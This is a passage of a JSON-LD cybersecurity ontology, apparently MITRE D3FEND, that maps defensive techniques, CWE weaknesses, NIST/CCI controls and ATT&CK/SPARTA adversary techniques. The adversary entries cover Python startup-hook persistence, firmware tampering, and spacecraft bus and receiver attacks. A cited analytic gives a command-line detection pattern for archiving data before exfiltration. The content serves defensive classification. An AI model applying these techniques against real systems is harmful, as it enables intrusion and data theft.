        "@id": "https://whatis.techtarget.com/definition/memory"
      },
      "rdfs:label": "Virtual Memory Space",
      "rdfs:seeAlso": {
        "@id": "https://dbpedia.org/page/Virtual_memory"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:MemoryAddressSpace"
      }
    },
    {
      "@id": "d3f:BayesianLinearRegressionLearning",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-BLRL",
      "d3f:definition": "A supervised learning method that builds a Bayesian linear regression model using training data.",
      "d3f:kb-article": "## References\nWikipedia. (n.d.). Bayesian linear regression. [Link](https://en.wikipedia.org/wiki/Bayesian_linear_regression)",
      "rdfs:label": "Bayesian Linear Regression Learning",
      "rdfs:seeAlso": {
        "@id": "d3f:BayesianLinearRegression"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:RegressionAnalysisLearning"
      }
    },
    {
      "@id": "d3f:T1588.004",
      "@type": "owl:Class",
      "d3f:attack-id": "T1588.004",
      "d3f:definition": "Adversaries may buy and/or steal SSL/TLS certificates that can be used during targeting. SSL/TLS certificates are designed to instill trust. They include information about the key, information about its owner's identity, and the digital signature of an entity that has verified the certificate's contents are correct. If the signature is valid, and the person examining the certificate trusts the signer, then they know they can use that key to communicate with its owner.",
      "rdfs:label": "Digital Certificates",
      "rdfs:subClassOf": {
        "@id": "d3f:T1588"
      }
    },
    {
      "@id": "d3f:Instance-basedTransferLearning",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-IBTL",
      "d3f:definition": "Instance-based transfer learning methods try to reweight the samples in the source domain in an attempt to correct for marginal distribution differences. These reweighted instances are then directly used in the target domain for training.",
      "d3f:kb-article": "## References\nGeorgian Impact Blog. (n.d.). Transfer Learning Part 1. [Link](https://medium.com/georgian-impact-blog/transfer-learning-part-1-ed0c174ad6e7#:~:text=Homogeneous%20Transfer%20Learning-,1.,the%20target%20domain%20for%20training).",
      "rdfs:label": "Instance-based Transfer Learning",
      "rdfs:subClassOf": {
        "@id": "d3f:HomogenousTransferLearning"
      }
    },
    {
      "@id": "d3f:CWE-1327",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1327",
      "d3f:definition": "The product assigns the address 0.0.0.0 for a database server, a cloud service/instance, or any computing resource that communicates remotely.",
      "rdfs:label": "Binding to an Unrestricted IP Address",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-668"
      }
    },
    {
      "@id": "d3f:NTPBroadcastEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event where an NTP server broadcasts time synchronization messages to multiple clients simultaneously, enabling synchronization without individual request-response cycles.",
      "rdfs:label": "NTP Broadcast Event",
      "rdfs:subClassOf": {
        "@id": "d3f:NTPEvent"
      }
    },
    {
      "@id": "d3f:ShadowStackComparisons",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:ShadowStackComparisons"
      ],
      "d3f:analyzes": {
        "@id": "d3f:StackFrame"
      },
      "d3f:d3fend-id": "D3-SSC",
      "d3f:definition": "Comparing a call stack in system memory with a shadow call stack maintained by the processor to determine unauthorized shellcode activity.",
      "d3f:kb-article": "## How it works\nThis technique compares the call stack stored in system memory with the shadow call stack maintained in the cache memory of the processor.  Mismatches between the two are compared since a return oriented programming attack may only be able to control or spoof the call stack and not the shadow call stack. Mismatches are counted and if the number of mismatches exceeds a certain threshold it is an indication of unauthorized activity and a security response action is performed.\n\n## Considerations\nIf the threshold for detecting a stack anomaly is low, it may not detect a return-oriented attack with just one gadget, such as a return-to-libc or return-to-plt attack.  Additionally, this technique may not detect JOP (Jump-oriented programming), as the return instruction is not executed.",
      "d3f:kb-reference": {
        "@id": "d3f:Reference-ThreatDetectionForReturnOrientedProgramming_CrowdstrikeInc"
      },
      "rdfs:label": "Shadow Stack Comparisons",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ProcessAnalysis"
        },
        {
          "@id": "_:N36cfe6e285174d00960501fd640404d4"
        }
      ]
    },
    {
      "@id": "_:N36cfe6e285174d00960501fd640404d4",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:analyzes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:StackFrame"
      }
    },
    {
      "@id": "d3f:OTAlarmMessage",
      "@type": "owl:Class",
      "d3f:definition": "Report danger, hazards, or serious errors.",
      "rdfs:comment": [
        "BACnet: acknowledgeAlarm\nBACnet: confirmedEventNotification\nBACnet: getAlarmSummary\nBACnet: unconfirmedEventNotification\nBACnet: lifeSafetyOperation\nBACnet: Abort: 1\nBACnet: Abort: 2\nBACnet: Abort: 3\nBACnet: Abort: 4\nBACnet: Abort: 5\nBACnet: Abort: 6\nBACnet: Abort: 7\nBACnet: Abort: 8\nBACnet: Abort: 9\nBACnet: Abort: 10\nBACnet: Abort: 11\nBACnet: Abort: 12 ",
        "GE-SRTP: RETURN FAULT TABLE\nGE-SRTP: CLEAR FAULT TABLE"
      ],
      "rdfs:label": "OT Alarm Message",
      "rdfs:seeAlso": [
        {
          "@id": "https://icscsi.org/library/Documents/ICS_Protocols/Control%20Microsystems%20-%20DNP3%20User%20and%20Reference%20Manual.pdf"
        },
        {
          "@id": "https://modbus.org/docs/Modbus_Application_Protocol_V1_1b3.pdf"
        },
        {
          "@id": "https://nvlpubs.nist.gov/nistpubs/TechnicalNotes/NIST.TN.2023.pdf"
        }
      ],
      "rdfs:subClassOf": {
        "@id": "d3f:OTDiagnosticsMessage"
      }
    },
    {
      "@id": "d3f:CWE-273",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-273",
      "d3f:definition": "The product attempts to drop privileges but does not check or incorrectly checks to see if the drop succeeded.",
      "rdfs:label": "Improper Check for Dropped Privileges",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CWE-271"
        },
        {
          "@id": "d3f:CWE-754"
        }
      ]
    },
    {
      "@id": "d3f:T0846",
      "@type": "owl:Class",
      "d3f:attack-id": "T0846",
      "d3f:definition": "Adversaries may attempt to get a listing of other systems by IP address, hostname, or other logical identifier on a network that may be used for subsequent Lateral Movement or Discovery techniques. Functionality could exist within adversary tools to enable this, but utilities available on the operating system or vendor software could also be used. (Citation: Enterprise ATT&CK January 2018)",
      "rdfs:label": "Remote System Discovery - ATTACK ICS",
      "rdfs:subClassOf": {
        "@id": "d3f:ATTACKICSDiscoveryTechnique"
      },
      "skos:prefLabel": "Remote System Discovery"
    },
    {
      "@id": "d3f:CWE-926",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-926",
      "d3f:definition": "The Android application exports a component for use by other applications, but does not properly restrict which applications can launch the component or access the data it contains.",
      "rdfs:label": "Improper Export of Android Application Components",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-285"
      }
    },
    {
      "@id": "d3f:T1629.001",
      "@type": "owl:Class",
      "d3f:attack-id": "T1629.001",
      "d3f:definition": "Adversaries may abuse the Android device administration API to prevent the user from uninstalling a target application. In earlier versions of Android, device administrator applications needed their administration capabilities explicitly deactivated by the user before the application could be uninstalled. This was later updated so the user could deactivate and uninstall the administrator application in one step.",
      "rdfs:label": "Prevent Application Removal - ATTACK Mobile",
      "rdfs:subClassOf": {
        "@id": "d3f:T1629"
      },
      "skos:prefLabel": "Prevent Application Removal"
    },
    {
      "@id": "d3f:MessageAnalysis",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:MessageAnalysis"
      ],
      "d3f:d3fend-id": "D3-MA",
      "d3f:definition": "Analyzing email or instant message content to detect unauthorized activity.",
      "d3f:enables": {
        "@id": "d3f:Detect"
      },
      "d3f:kb-article": "## Technique Overview\n\nEmail and messaging are frequently used to deliver malicious content to targets. These enterprise capabilities are used to deliver software exploits or social engineering tricks. If the recipient of a message trusts the sender, attackers can avoid escalating suspicion.\n\nEmails and messages are also complex data structures. They contain files and links, and complex data encodings which vary region to region. Thus the defensive techniques used to analyze emails and messages are highly varied ranging from deep content analysis and execution to social network graph-style analytics to analyze trust or risk.",
      "d3f:synonym": [
        "Electronic Message Analysis",
        "Email Or Messaging Analysis"
      ],
      "rdfs:label": "Message Analysis",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:DefensiveTechnique"
        },
        {
          "@id": "_:N96596a3048da4ab2ac5c8f3f1fd630c4"
        }
      ]
    },
    {
      "@id": "_:N96596a3048da4ab2ac5c8f3f1fd630c4",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:enables"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Detect"
      }
    },
    {
      "@id": "d3f:FingerPrintScannerInputDevice",
      "@type": "owl:Class",
      "d3f:definition": "A fingerprint sensor is an electronic device used to capture a digital image of the fingerprint pattern. The captured image is called a live scan. This live scan is digitally processed to create a biometric template (a collection of extracted features) which is stored and used for matching. Many technologies have been used including optical, capacitive, RF, thermal, piezoresistive, ultrasonic, piezoelectric, and MEMS.",
      "rdfs:isDefinedBy": {
        "@id": "http://dbpedia.org/resource/Fingerprint#Fingerprint_sensors"
      },
      "rdfs:label": "Finger Print Scanner Input Device",
      "rdfs:subClassOf": {
        "@id": "d3f:ImageScannerInputDevice"
      },
      "skos:altLabel": "Fingerprint Sensor"
    },
    {
      "@id": "d3f:T1590.003",
      "@type": "owl:Class",
      "d3f:attack-id": "T1590.003",
      "d3f:definition": "Adversaries may gather information about the victim's network trust dependencies that can be used during targeting. Information about network trusts may include a variety of details, including second or third-party organizations/domains (ex: managed service providers, contractors, etc.) that have connected (and potentially elevated) network access.",
      "rdfs:label": "Network Trust Dependencies",
      "rdfs:subClassOf": {
        "@id": "d3f:T1590"
      }
    },
    {
      "@id": "d3f:LM-0002",
      "@type": "owl:Class",
      "d3f:attack-id": "LM-0002",
      "d3f:definition": "On flat architectures, where remote terminals, subsystems, and payloads share a common bus with minimal partitioning, any node that can transmit may influence many others. An attacker leverages this by forging message IDs or terminal addresses, replaying actuator/sensor frames, seizing or imitating bus-controller roles, or abusing gateway bridges that forward traffic between links (e.g., 1553↔SpaceWire/CAN). Because consumers often act on the latest valid-looking message, crafted traffic from one compromised device can reconfigure peers, toggle power domains, or write persistent parameters. Weak role enforcement and broadcast semantics allow privilege escalation from a peripheral to effective system-wide influence, turning the shared medium into a highway for further compromise.",
      "rdfs:label": "Exploit Lack of Bus Segregation - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/LM-0002/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:SPARTALateralMovementTechnique"
      },
      "skos:prefLabel": "Exploit Lack of Bus Segregation"
    },
    {
      "@id": "d3f:restores",
      "@type": "owl:ObjectProperty",
      "d3f:definition": "x restores y: The entity x returns entity y to its known-good or previous state.",
      "rdfs:label": "restores",
      "rdfs:subPropertyOf": {
        "@id": "d3f:associated-with"
      }
    },
    {
      "@id": "d3f:NIST_SP_800-53_R5_RA-5_4",
      "@type": [
        "owl:NamedIndividual",
        "d3f:NISTControl"
      ],
      "d3f:control-name": "Vulnerability Monitoring and Scanning | Discoverable Information",
      "d3f:member-of": {
        "@id": "d3f:NIST_SP_800-53_R5"
      },
      "d3f:related": [
        {
          "@id": "d3f:DecoyEnvironment"
        },
        {
          "@id": "d3f:DecoyObject"
        }
      ],
      "rdfs:label": "RA-5(4)"
    },
    {
      "@id": "d3f:CCI-000346_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The organization employs automated mechanisms to enforce access restrictions.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:narrower": [
        {
          "@id": "d3f:LocalFilePermissions"
        },
        {
          "@id": "d3f:UserAccountPermissions"
        }
      ],
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2009-09-18T00:00:00"
      },
      "rdfs:label": "CCI-000346"
    },
    {
      "@id": "d3f:DE-0003.04",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "DE-0003.04",
      "d3f:definition": "Threat actors may target the on-board command receivers received signal parameters (i.e., automatic gain control (AGC)) in order to stop specific commands or signals from being processed by the spacecraft. For ground controllers to communicate with spacecraft in orbit, the on-board receivers need to be configured to receive signals with a specific signal to noise ratio (ratio of signal power to the noise power). Targeting values related to the antenna signaling that are modifiable can prevent the spacecraft from receiving ground commands.",
      "d3f:modifies": {
        "@id": "d3f:SystemPlatformVariable"
      },
      "rdfs:label": "Command Receivers Received Signal Strength - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/DE-0003/04/"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:DE-0003"
        },
        {
          "@id": "_:N8ddb605f34194f0486ff3df1892e8397"
        }
      ],
      "skos:prefLabel": "Command Receivers Received Signal Strength"
    },
    {
      "@id": "_:N8ddb605f34194f0486ff3df1892e8397",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:modifies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:SystemPlatformVariable"
      }
    },
    {
      "@id": "d3f:T1546.018",
      "@type": "owl:Class",
      "d3f:attack-id": "T1546.018",
      "d3f:definition": "Adversaries may achieve persistence by leveraging Python’s startup mechanisms, including path configuration (`.pth`) files and the `sitecustomize.py` or `usercustomize.py` modules. These files are automatically processed during the initialization of the Python interpreter, allowing for the execution of arbitrary code whenever Python is invoked.(Citation: Volexity GlobalProtect CVE 2024)",
      "rdfs:label": "Python Startup Hooks",
      "rdfs:subClassOf": {
        "@id": "d3f:T1546"
      }
    },
    {
      "@id": "d3f:T1584.008",
      "@type": "owl:Class",
      "d3f:attack-id": "T1584.008",
      "d3f:definition": "Adversaries may compromise third-party network devices that can be used during targeting. Network devices, such as small office/home office (SOHO) routers, may be compromised where the adversary's ultimate goal is not [Initial Access](https://attack.mitre.org/tactics/TA0001) to that environment -- instead leveraging these devices to support additional targeting.",
      "rdfs:label": "Network Devices",
      "rdfs:subClassOf": {
        "@id": "d3f:T1584"
      }
    },
    {
      "@id": "d3f:BinaryLargeObject",
      "@type": "owl:Class",
      "d3f:definition": "A binary large object (BLOB) is a collection of binary data stored as a single entity. Blobs are typically images, audio or other multimedia objects, though sometimes binary executable code is stored as a blob.",
      "rdfs:isDefinedBy": {
        "@id": "dbr:Binary_large_object"
      },
      "rdfs:label": "Binary Large Object",
      "rdfs:subClassOf": {
        "@id": "d3f:DigitalInformationBearer"
      },
      "skos:altLabel": [
        "BLOB",
        "Blob"
      ]
    },
    {
      "@id": "d3f:T1070.004",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1070.004",
      "d3f:definition": "Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary (ex: [Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105)) may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.",
      "d3f:deletes": {
        "@id": "d3f:File"
      },
      "d3f:may-modify": {
        "@id": "d3f:File"
      },
      "rdfs:label": "File Deletion",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1070"
        },
        {
          "@id": "_:N50b61974de3f4499a614d57f8d7063c9"
        },
        {
          "@id": "_:Ndd37d2ac220e429fb4051ad1c207eed9"
        }
      ]
    },
    {
      "@id": "_:N50b61974de3f4499a614d57f8d7063c9",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:deletes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:File"
      }
    },
    {
      "@id": "_:Ndd37d2ac220e429fb4051ad1c207eed9",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-modify"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:File"
      }
    },
    {
      "@id": "d3f:operating-system",
      "@type": "owl:DatatypeProperty",
      "d3f:definition": "x operating-system y: The product x is supported on operating system y.",
      "rdfs:label": {
        "@language": "en",
        "@value": "operating-system"
      },
      "rdfs:range": {
        "@id": "xsd:string"
      },
      "rdfs:subPropertyOf": {
        "@id": "d3f:d3fend-catalog-data-property"
      }
    },
    {
      "@id": "d3f:Reference-RunDLL32.exeMonitoring_MITRE",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ExternalKnowledgeBase"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://car.mitre.org/analytics/CAR-2014-03-006/"
      },
      "d3f:kb-abstract": "Adversaries may find it necessary to use Dyanamic-link Libraries (DLLs) to evade defenses. One way these DLLs can be \"executed\" is through the use of the built-in Windows utility RunDLL32, which allows a user to execute code in a DLL, providing the name and optional arguments to an exported entry point. Windows uses RunDll32 legitimately in its normal operation, but with a proper baseline and understanding of the environment, monitoring its usage could be fruitful.",
      "d3f:kb-author": "MITRE",
      "d3f:kb-mitre-analysis": "",
      "d3f:kb-organization": "MITRE",
      "d3f:kb-reference-of": {
        "@id": "d3f:ProcessSpawnAnalysis"
      },
      "d3f:kb-reference-title": "CAR-2014-03-006: RunDLL32.exe monitoring",
      "rdfs:label": "Reference - CAR-2014-03-006: RunDLL32.exe monitoring - MITRE"
    },
    {
      "@id": "d3f:may-invoke",
      "@type": "owl:ObjectProperty",
      "d3f:definition": "x may-invoke y: The entity x may invoke the thing y; that is, 'x invokes y' may be true.",
      "rdfs:label": "may-invoke",
      "rdfs:subPropertyOf": {
        "@id": "d3f:may-be-associated-with"
      }
    },
    {
      "@id": "d3f:FileCarving",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:FileCarving"
      ],
      "d3f:analyzes": {
        "@id": "d3f:FileTransferNetworkTraffic"
      },
      "d3f:d3fend-id": "D3-FC",
      "d3f:definition": "Identifying and extracting files from network application protocols through the use of network stream reassembly software.",
      "d3f:kb-article": "## How it works\nProtocol stream reassembly software recreates a directional byte stream by analyzing captured network packets. Once the stream is reassembled pattern matching is applied to determine if it contains a file of interest. Files of interest range from executable, archive, or document file formats. Once the file is captured, it is then processed with standard File Analysis Techniques. Example network protocols include HTTP, SMTP, FTP, HTTP/2, and TLS/HTTP/Dropbox.\n\n## Considerations\n- This is an error prone process due to the intricacies of network protocols and network packet capture.  For example reassembly may be done in real-time or streaming fashion, or packets may be written to disk, then bulk processed.  The packets may arrive out of order, with fragmentation, duplicates, or re-transmissions.  The reassembly software must compensate for the imperfect packet stream in order to recreate the well formed file which was transmitted.\n- File type identification can be a difficult process which can be exploited by adversaries.",
      "d3f:kb-reference": {
        "@id": "d3f:Reference-ComputerWormDefenseSystemAndMethod_FireEyeInc"
      },
      "rdfs:label": "File Carving",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:NetworkTrafficAnalysis"
        },
        {
          "@id": "_:N1e26f9b4e5dd40cb8e1be254d8a58416"
        }
      ]
    },
    {
      "@id": "_:N1e26f9b4e5dd40cb8e1be254d8a58416",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:analyzes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:FileTransferNetworkTraffic"
      }
    },
    {
      "@id": "d3f:Reference-CommandLineUsageOfArchivingSoftware_MITRE",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ExternalKnowledgeBase"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://car.mitre.org/analytics/CAR-2013-07-005/"
      },
      "d3f:kb-abstract": "Before exfiltrating data that an adversary has collected, it is very likely that a compressed archive will be created, so that transfer times are minimized and fewer files are transmitted. There is variety between the tools used to compress data, but the command line usage and context of archiving tools, such as ZIP, RAR, and 7ZIP, should be monitored.\n\nIn addition to looking for RAR or 7z program names, command line usage of 7Zip or RAR can be detected with the flag usage of \"\\* a \\*\". This is helpful, as adversaries may change program names.",
      "d3f:kb-author": "",
      "d3f:kb-mitre-analysis": "",
      "d3f:kb-organization": "",
      "d3f:kb-reference-of": {
        "@id": "d3f:ProcessSpawnAnalysis"
      },
      "d3f:kb-reference-title": "CAR-2013-07-005: Command Line Usage of Archiving Software",
      "rdfs:label": "Reference - CAR-2013-07-005: Command Line Usage of Archiving Software - MITRE"
    },
    {
      "@id": "d3f:WindowsRegistry",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:contains": {
        "@id": "d3f:WindowsRegistryKey"
      },
      "d3f:definition": "The Windows Registry is a hierarchical database that stores low-level settings for the Microsoft Windows operating system and for applications that opt to use the registry. The kernel, device drivers, services, Security Accounts Manager, and user interface can all use the registry. The registry also allows access to counters for profiling system performance.",
      "rdfs:isDefinedBy": [
        {
          "@id": "dbr:Windows_Registry"
        },
        {
          "@id": "https://learn.microsoft.com/en-us/troubleshoot/windows-server/performance/windows-registry-advanced-users"
        }
      ],
      "rdfs:label": "Windows Registry",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:SystemConfigurationDatabase"
        },
        {
          "@id": "_:Ndb1b748e32944ceb8af3065e7b496157"
        }
      ]
    },
    {
      "@id": "_:Ndb1b748e32944ceb8af3065e7b496157",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:contains"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:WindowsRegistryKey"
      }
    },
    {
      "@id": "d3f:T0829",
      "@type": "owl:Class",
      "d3f:attack-id": "T0829",
      "d3f:definition": "Adversaries may cause a sustained or permanent loss of view where the ICS equipment will require local, hands-on operator intervention; for instance, a restart or manual operation. By causing a sustained reporting or visibility loss, the adversary can effectively hide the present state of operations. This loss of view can occur without affecting the physical processes themselves. (Citation: Corero) (Citation: Michael J. Assante and Robert M. Lee) (Citation: Tyson Macaulay)",
      "rdfs:label": "Loss of View - ATTACK ICS",
      "rdfs:subClassOf": {
        "@id": "d3f:ATTACKICSImpactTechnique"
      },
      "skos:prefLabel": "Loss of View"
    },
    {
      "@id": "d3f:T0831",
      "@type": "owl:Class",
      "d3f:attack-id": "T0831",
      "d3f:definition": "Adversaries may manipulate physical process control within the industrial environment. Methods of manipulating control can include changes to set point values, tags, or other parameters. Adversaries may manipulate control systems devices or possibly leverage their own, to communicate with and command physical control processes. The duration of manipulation may be temporary or longer sustained, depending on operator detection.",
      "rdfs:label": "Manipulation of Control - ATTACK ICS",
      "rdfs:subClassOf": {
        "@id": "d3f:ATTACKICSImpactTechnique"
      },
      "skos:prefLabel": "Manipulation of Control"
    },
    {
      "@id": "d3f:SystemInitConfigAnalysis",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:SystemInitConfigAnalysis"
      ],
      "d3f:analyzes": {
        "@id": "d3f:SystemInitConfiguration"
      },
      "d3f:d3fend-id": "D3-SICA",
      "d3f:definition": "Analysis of any system process startup configuration.",
      "d3f:kb-reference": [
        {
          "@id": "d3f:Reference-AutorunDifferences_MITRE"
        },
        {
          "@id": "d3f:Reference-CAR-2020-09-005%3AAppInitDLLs_MITRE"
        },
        {
          "@id": "d3f:Reference-CAR-2020-11-001%3ABootOrLogonInitializationScripts_MITRE"
        }
      ],
      "d3f:synonym": [
        "Autorun Analysis",
        "Startup Analysis"
      ],
      "rdfs:label": "System Init Config Analysis",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:OperatingSystemMonitoring"
        },
        {
          "@id": "_:Nea9ba776257f4e639e07907dd670deb9"
        }
      ],
      "skos:altLabel": "System Initialization Configuration Analysis"
    },
    {
      "@id": "_:Nea9ba776257f4e639e07907dd670deb9",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:analyzes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:SystemInitConfiguration"
      }
    },
    {
      "@id": "d3f:CWE-73",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-73",
      "d3f:definition": "The product allows user input to control or influence paths or file names that are used in filesystem operations.",
      "rdfs:label": "External Control of File Name or Path",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CWE-610"
        },
        {
          "@id": "d3f:CWE-642"
        }
      ]
    },
    {
      "@id": "d3f:CWE-1054",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1054",
      "d3f:definition": "The code at one architectural layer invokes code that resides at a deeper layer than the adjacent layer, i.e., the invocation skips at least one layer, and the invoked code is not part of a vertical utility layer that can be referenced from any horizontal layer.",
      "rdfs:label": "Invocation of a Control Element at an Unnecessarily Deep Horizontal Layer",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-1061"
      }
    },
    {
      "@id": "d3f:T1542.002",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1542.002",
      "d3f:definition": "Adversaries may modify component firmware to persist on systems. Some adversaries may employ sophisticated means to compromise computer components and install malicious firmware that will execute adversary code outside of the operating system and main system firmware or BIOS. This technique may be similar to [System Firmware](https://attack.mitre.org/techniques/T1542/001) but conducted upon other system components/devices that may not have the same capability or level of integrity checking.",
      "d3f:modifies": {
        "@id": "d3f:Firmware"
      },
      "rdfs:label": "Component Firmware",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1542"
        },
        {
          "@id": "_:N4a424a6868bc41f88a435dab9ea8f6ff"
        }
      ]
    },
    {
      "@id": "_:N4a424a6868bc41f88a435dab9ea8f6ff",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:modifies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Firmware"
      }
    },
    {
      "@id": "d3f:ImpersonateUser",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:SystemCall"
      ],
      "d3f:forges": {
        "@id": "d3f:UserAccount"
      },
      "rdfs:label": "Impersonate User",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:SystemCall"
        },
        {
          "@id": "_:Nb65d93233035400895145761e6fb9b76"
        }
      ]
    },
    {
      "@id": "_:Nb65d93233035400895145761e6fb9b76",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:forges"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:UserAccount"
      }
    },
    {
      "@id": "d3f:CCI-000417_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:broader": [
        {
          "@id": "d3f:ExecutionIsolation"
        },
        {
          "@id": "d3f:NetworkIsolation"
        }
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The organization disables network access by unauthorized components/devices or notifies designated organizational officials.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2009-09-18T00:00:00"
      },
      "rdfs:label": "CCI-000417"
    },
    {
      "@id": "d3f:may-be-modified-by",
      "@type": "owl:ObjectProperty",
      "owl:inverseOf": {
        "@id": "d3f:may-modify"
      },
      "rdfs:label": "may-be-modified-by",
      "rdfs:subPropertyOf": {
        "@id": "d3f:may-be-associated-with"
      }
    },
    {
      "@id": "d3f:inventories",
      "@type": "owl:ObjectProperty",
      "d3f:definition": "x inventories y: The entity x systematically discovers entity y and records its presence and key details for tracking.",
      "rdfs:label": "inventories",
      "rdfs:subPropertyOf": {
        "@id": "d3f:associated-with"
      }
    },
    {
      "@id": "d3f:EmailRemoval",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:EmailRemoval"
      ],
      "d3f:d3fend-id": "D3-ER",
      "d3f:definition": "The email removal technique deletes email files from system storage.",
      "d3f:deletes": {
        "@id": "d3f:Email"
      },
      "d3f:kb-article": "## How it works\n\nEmail removal is a technique that can be used to prevent a user from executing malware or responding to phishing attempts. Security software or users themselves may detect malicious or suspicious email in a local or remote mail folder email and then employ this technique.\n\n## Considerations\n\nFor email that needs to be removed, an infosec organization may choose to take additional follow-up actions (such as blocking the sources or notifying providers), rather than only relying on email deletion.\n\nFor the case where users detect likely suspicious email files, the organization should consider implementing a means for reporting these emails to their infosec organization.\n\nEmail files may propagate through many storage systems across the an organization's systems over time, so early detection and blocking helps avoid residual, latent stores of malicous email content in the enterprise.",
      "d3f:kb-reference": {
        "@id": "d3f:Reference-SystemAndMethodForScanningRemoteServicesToLocateStoredObjectsWithMalware"
      },
      "d3f:may-access": {
        "@id": "d3f:MailServer"
      },
      "d3f:synonym": "Email Deletion",
      "rdfs:label": "Email Removal",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:FileEviction"
        },
        {
          "@id": "_:N043f4cbf02f448709fc4d9d3185b399f"
        },
        {
          "@id": "_:N2ef8d6cbd941427ba355f98487d0f6f4"
        }
      ]
    },
    {
      "@id": "_:N043f4cbf02f448709fc4d9d3185b399f",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:deletes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Email"
      }
    },
    {
      "@id": "_:N2ef8d6cbd941427ba355f98487d0f6f4",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-access"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:MailServer"
      }
    },
    {
      "@id": "d3f:d3fend-artifact-data-property",
      "@type": "owl:DatatypeProperty",
      "d3f:definition": "x d3fend-artifact-data-property y: The artifact x has the data property y.",
      "rdfs:domain": {
        "@id": "d3f:DigitalArtifact"
      },
      "rdfs:label": "d3fend-artifact-data-property",
      "rdfs:subPropertyOf": {
        "@id": "d3f:d3fend-data-property"
      }
    },
    {
      "@id": "d3f:WindowsNtWriteVirtualMemory",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "rdfs:label": "Windows NtWriteVirtualMemory",
      "rdfs:subClassOf": {
        "@id": "d3f:OSAPIWriteMemory"
      }
    },
    {
      "@id": "d3f:T0890",
      "@type": "owl:Class",
      "d3f:attack-id": "T0890",
